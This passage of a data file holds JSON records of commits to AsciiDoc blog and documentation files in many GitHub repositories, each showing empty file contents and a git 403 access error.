403\n","license":"mit","lang":"AsciiDoc"} {"commit":"502723a2e1baf6764b8a8098672b7589c0febe88","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cd1f79adf964df75fd9d7dd7720e75dc0a4bc73","subject":"y2b create post YOUTUBE SENT ME A GIFT!","message":"y2b create post YOUTUBE SENT ME A GIFT!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-22-YOUTUBE-SENT-ME-A-GIFT.adoc","new_file":"_posts\/2015-12-22-YOUTUBE-SENT-ME-A-GIFT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"249ff4c81cc34a9ba7625a3eb4d6af093dcc0fb9","subject":"Update 2016-11-08-185000-Tuesday-Evening.adoc","message":"Update 2016-11-08-185000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8756d6efa0102f4e67fd5689deb08e37ef43d812","subject":"DBZ-4260 blog posts for Debezium UI SMTs and Topic Groups","message":"DBZ-4260 blog posts for Debezium UI SMTs and Topic Groups\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-11-22-debezium-ui-transforms.adoc","new_file":"_posts\/2021-11-22-debezium-ui-transforms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4013719a53f9e8a34c7c9e5318e857b360b9076","subject":"Create secure-comm.adoc","message":"Create secure-comm.adoc","repos":"jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05eb23e41d6938bd4aaf14183765b0751baed283","subject":"Update 2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","message":"Update 2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","new_file":"_posts\/2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20091dc55c696d9258dfab92bbe69183b1d72e61","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"504eda250bb52c2c2013c34251733e0d8701fb3a","subject":"Deleted 2016-11-3-you-know-what.adoc","message":"Deleted 2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"2016-11-3-you-know-what.adoc","new_file":"2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5db0aa47a06a1932de745e1142306f8729c16eff","subject":"y2b create post GoldenEye 007 Reloaded Double O Edition Unboxing (PS3)","message":"y2b create post GoldenEye 007 Reloaded Double O Edition Unboxing (PS3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-03-GoldenEye-007-Reloaded-Double-O-Edition-Unboxing-PS3.adoc","new_file":"_posts\/2011-11-03-GoldenEye-007-Reloaded-Double-O-Edition-Unboxing-PS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c3be46a7af017e8b010b63df1c5101d1bdc7834","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26cd24b8a03063ab0773a66aa236208affa1f4fb","subject":"Update 2016-10-12-Teste.adoc","message":"Update 2016-10-12-Teste.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-12-Teste.adoc","new_file":"_posts\/2016-10-12-Teste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba97b63e0f9af9e2a2d1f69225cf1ce59cba69df","subject":"Renamed 
'_posts\/2017-10-27-Cyber-Exile.adoc' to '_posts\/2017-10-27-Intro.adoc'","message":"Renamed '_posts\/2017-10-27-Cyber-Exile.adoc' to '_posts\/2017-10-27-Intro.adoc'","repos":"netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io","old_file":"_posts\/2017-10-27-Intro.adoc","new_file":"_posts\/2017-10-27-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netrunnerX\/netrunnerx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f29effa7afc30613a0997a84fb4133515420fab","subject":"Update 2017-05-26-Pattern-matching-in-haskell.adoc","message":"Update 2017-05-26-Pattern-matching-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-26-Pattern-matching-in-haskell.adoc","new_file":"_posts\/2017-05-26-Pattern-matching-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"298737d04b42199de3c7c47d1f26a28411c431e5","subject":"Update 2017-03-14-First-Post.adoc","message":"Update 2017-03-14-First-Post.adoc","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29f959780d10175566678f7c2beba58c98f31e1e","subject":"Update 2016-04-22-prueba.adoc","message":"Update 2016-04-22-prueba.adoc","repos":"carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io","old_file":"_posts\/2016-04-22-prueba.adoc","new_file":"_posts\/2016-04-22-prueba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlosdominguezmartin\/carlosdominguezmartin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f030adb6eb415b8889789afa03175ff4f928bcf8","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccf66b2cdac0d6a8770068530e3f28fc05add1be","subject":"Update hawkular-command-gateway-clients.adoc","message":"Update 
hawkular-command-gateway-clients.adoc","repos":"hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/01\/21\/hawkular-command-gateway-clients.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/01\/21\/hawkular-command-gateway-clients.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ef5d8f6ed18d9a42424994eaa793118824f83a1","subject":"Correction from artifact_list to names in example","message":"Correction from artifact_list to names in example\n\nExample used the wrong attribute.","repos":"vonnopsled\/artifacts,pidydx\/artifacts,sebastianwelsh\/artifacts,sebastianwelsh\/artifacts,destijl\/artifacts,keithtyler\/artifacts,vonnopsled\/artifacts,keithtyler\/artifacts,destijl\/artifacts,pidydx\/artifacts,crankyoldgit\/artifacts,crankyoldgit\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"286e2aa6000e5d2bf89f61fb97585ba2aac23cc6","subject":"Add 502","message":"Add 502\n","repos":"arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"05-path-next-steps\/502-for-further-reading\/readme.adoc","new_file":"05-path-next-steps\/502-for-further-reading\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7ad32effe071db169a0b6751b81df81343ae9ab","subject":"Update 2016-11-04-Welcome.adoc","message":"Update 2016-11-04-Welcome.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-04-Welcome.adoc","new_file":"_posts\/2016-11-04-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40fcf9e4379a4d40fb3728cd47425f464c0e894e","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4107d9bff7b1522664a9b7683154bdd053c5d92f","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"597c319cb068220bfc85c77ed225cf85fbe32d25","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c6f63ef7f3136713530dcd6ce660d8582b644c3","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ebf3202e865546061bcbe319b20785b51a736b5","subject":"Update 2016-10-02-about-crotel-studio.adoc","message":"Update 2016-10-02-about-crotel-studio.adoc","repos":"crotel\/studio,crotel\/studio,crotel\/studio,crotel\/studio","old_file":"_posts\/2016-10-02-about-crotel-studio.adoc","new_file":"_posts\/2016-10-02-about-crotel-studio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/studio.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe0c17e5c4696772f04c33fbfcae8643be044020","subject":"Update 2019-01-31-Thrasos.adoc","message":"Update 
2019-01-31-Thrasos.adoc","repos":"thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io","old_file":"_posts\/2019-01-31-Thrasos.adoc","new_file":"_posts\/2019-01-31-Thrasos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrasos\/thrasos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a95d817f6d50c0a0b189a10ddcc156ca2f06170","subject":"Update 2013-04-24-yahoomail-gmail-user-experience.adoc","message":"Update 2013-04-24-yahoomail-gmail-user-experience.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-04-24-yahoomail-gmail-user-experience.adoc","new_file":"_posts\/2013-04-24-yahoomail-gmail-user-experience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dea8cccd528fc484fa51e0b4c0631f4677bdad47","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f53cbac5f6f84c02656f7f2773fc2c04d45648cb","subject":"Update 2016-06-08-Doker-nakonec-to-Docker-at-last.adoc","message":"Update 2016-06-08-Doker-nakonec-to-Docker-at-last.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-06-08-Doker-nakonec-to-Docker-at-last.adoc","new_file":"_posts\/2016-06-08-Doker-nakonec-to-Docker-at-last.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9e483d447f635e23fcae9317c3463d055d10b28","subject":"updated abstract","message":"updated abstract\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"186e9cc0cd6a27a13f83c4c9730922553ef5795d","subject":"y2b create post Dyson Vacuum - Does It Suck?","message":"y2b create post Dyson Vacuum - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-24-Dyson-Vacuum--Does-It-Suck.adoc","new_file":"_posts\/2015-11-24-Dyson-Vacuum--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1da96d627862dcbaa6951ffa77dab864cb2b9a08","subject":"Update 2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2d7fc60b9e44a11bb9b17f150c61f89571099fc","subject":"Update 2018-02-19-How-to-compile-JSP-with-Tomcat-and-Maven-faster-20.adoc","message":"Update 2018-02-19-How-to-compile-JSP-with-Tomcat-and-Maven-faster-20.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2018-02-19-How-to-compile-JSP-with-Tomcat-and-Maven-faster-20.adoc","new_file":"_posts\/2018-02-19-How-to-compile-JSP-with-Tomcat-and-Maven-faster-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e565b197188151e023e451064434142c0a69ce6","subject":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","message":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0208611fbe3d249f044cad2a21b69944fc72ac8e","subject":"DELTASPIKE-823 updated documentation","message":"DELTASPIKE-823 updated 
documentation","repos":"os890\/deltaspike-vote,idontgotit\/deltaspike,danielsoro\/deltaspike,danielsoro\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,chkal\/deltaspike,tremes\/deltaspike,apache\/deltaspike,struberg\/deltaspike,tremes\/deltaspike,os890\/deltaspike-vote,mlachat\/deltaspike,Danny02\/deltaspike,tremes\/deltaspike,chkal\/deltaspike,subaochen\/deltaspike,rdicroce\/deltaspike,rdicroce\/deltaspike,mlachat\/deltaspike,apache\/deltaspike,rdicroce\/deltaspike,os890\/DS_Discuss,rdicroce\/deltaspike,idontgotit\/deltaspike,Danny02\/deltaspike,danielsoro\/deltaspike,apache\/deltaspike,Danny02\/deltaspike,struberg\/deltaspike,os890\/deltaspike-vote,os890\/deltaspike-vote,os890\/DS_Discuss,mlachat\/deltaspike,chkal\/deltaspike,subaochen\/deltaspike,apache\/deltaspike,Danny02\/deltaspike,tremes\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,os890\/DS_Discuss,struberg\/deltaspike,danielsoro\/deltaspike,struberg\/deltaspike","old_file":"documentation\/src\/main\/asciidoc\/partial-bean.adoc","new_file":"documentation\/src\/main\/asciidoc\/partial-bean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bdd89a01a6043ca0edac509a3bf96e1ab9d73be","subject":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","message":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc5d24fb7ed4e467f263f8950548d14e29f80aa7","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eb2ab915d91ca9458dc1e0aee7f1f7c616f3bc5","subject":"Docs: Fixed date format default option","message":"Docs: Fixed date format default 
option\n","repos":"kaneshin\/elasticsearch,sneivandt\/elasticsearch,StefanGor\/elasticsearch,hanswang\/elasticsearch,jbertouch\/elasticsearch,rmuir\/elasticsearch,fred84\/elasticsearch,dongjoon-hyun\/elasticsearch,martinstuga\/elasticsearch,beiske\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,camilojd\/elasticsearch,jpountz\/elasticsearch,episerver\/elasticsearch,Ansh90\/elasticsearch,lydonchandra\/elasticsearch,markwalkom\/elasticsearch,Rygbee\/elasticsearch,strapdata\/elassandra,Chhunlong\/elasticsearch,HarishAtGitHub\/elasticsearch,rento19962\/elasticsearch,abibell\/elasticsearch,linglaiyao1314\/elasticsearch,njlawton\/elasticsearch,ImpressTV\/elasticsearch,elancom\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,ulkas\/elasticsearch,infusionsoft\/elasticsearch,sposam\/elasticsearch,18098924759\/elasticsearch,IanvsPoplicola\/elasticsearch,kubum\/elasticsearch,franklanganke\/elasticsearch,andrestc\/elasticsearch,glefloch\/elasticsearch,ESamir\/elasticsearch,bestwpw\/elasticsearch,pritishppai\/elasticsearch,ESamir\/elasticsearch,ivansun1010\/elasticsearch,PhaedrusTheGreek\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,onegambler\/elasticsearch,rmuir\/elasticsearch,truemped\/elasticsearch,truemped\/elasticsearch,diendt\/elasticsearch,kaneshin\/elasticsearch,elasticdog\/elasticsearch,slavau\/elasticsearch,clintongormley\/elasticsearch,kunallimaye\/elasticsearch,luiseduardohdbackup\/elasticsearch,dpursehouse\/elasticsearch,s1monw\/elasticsea